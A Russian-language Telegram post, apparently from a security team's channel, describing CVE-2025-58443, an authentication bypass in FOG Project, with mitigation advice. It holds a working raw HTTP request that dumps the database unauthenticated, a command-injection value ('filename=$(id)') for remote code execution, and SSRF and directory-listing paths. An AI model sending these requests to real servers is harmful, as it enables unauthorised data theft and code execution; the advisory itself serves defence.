TGViewer
Четыре луча Четыре луча @four_rays · 4.02K subscribers
Post #132 3.34K
Одна уязвимость три проблемы — CVE-2025-58443

CVE-2025–58443 — это уязвимость обхода авторизации в FOG Project. Версии 1.5.10.1673 и ниже уязвимы.

😬 Метрики
Base Core: 9.9
CWE: CWE-306 CWE-287


Злоумышленник может:
1️⃣ выполнить неаутентифицированный дамп базы данных;
2️⃣ листинг директорий;
3️⃣ выполнить SSRF-атаку, а также Open redirection.

😬 Подробнее
Уязвимость заключается в том, что при обращении к конечным точкам не проверяется авторизация. POST запрос на данную конечную точку /fog/management/export.php приведет к извлечению базы.
POST /fog/management/export.php HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

fogguiuser=&fogguipass=&nojson=4&export=3


Дополнение: данный URI так же уязвим к RCE в версии ≤ 1.5.10.34. RCE передается через аналогичный POST запрос на /fog/management/export.php?filename=$(id)&type=pdf.

☀️ GET запрос на /fog/service/getversion.php?url=<PATH> вызовет SSRF.
☀️ GET запрос на /fog/status/getfiles.php?path=<DIR> вызовет листинг каталога.

Сейчас известно только о трех уязвимых точках. Процесс эксплуатации — на скриншоте.

😬 Как защищаться
1) Обновиться.
2) Закрыть доступ к /fog/service/, /fog/status/, /fog/management/ для внешних IP, например, правилами на WAF/IDS.
  • 🔥 6
  • 👍 3
  • ❤ 2
  • 🤔 1
More from @four_rays
  1. Sep 14, 2026💣 Ржавый код: почему все переходят на Rust и когда аналитику можно его не реверсить Rust…
  2. Sep 11, 2026😳 DFIR diggin’ deeper: неочевидные источники артефактов при расследовании атак Когда стан…
  3. Sep 7, 2026😀 Call for Papers на технострим SOC Forum 2026 еще открыт! Темы: 1️⃣ Offense: актуальные…
  4. Aug 31, 2026☀️ Zimbra, все еще скрывающая боль Ранее мы уже рассказывали о расследовании «Zimbra, скры…
  5. Aug 19, 2026💡 Разберемся с непопулярными артефактами на OffZone 2026 Выбираете, какие выступления пос…
  6. Aug 17, 2026😀 Admin may cry CVE-2026-41452 — уязвимость, позволяющая перезаписать данные администрато…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →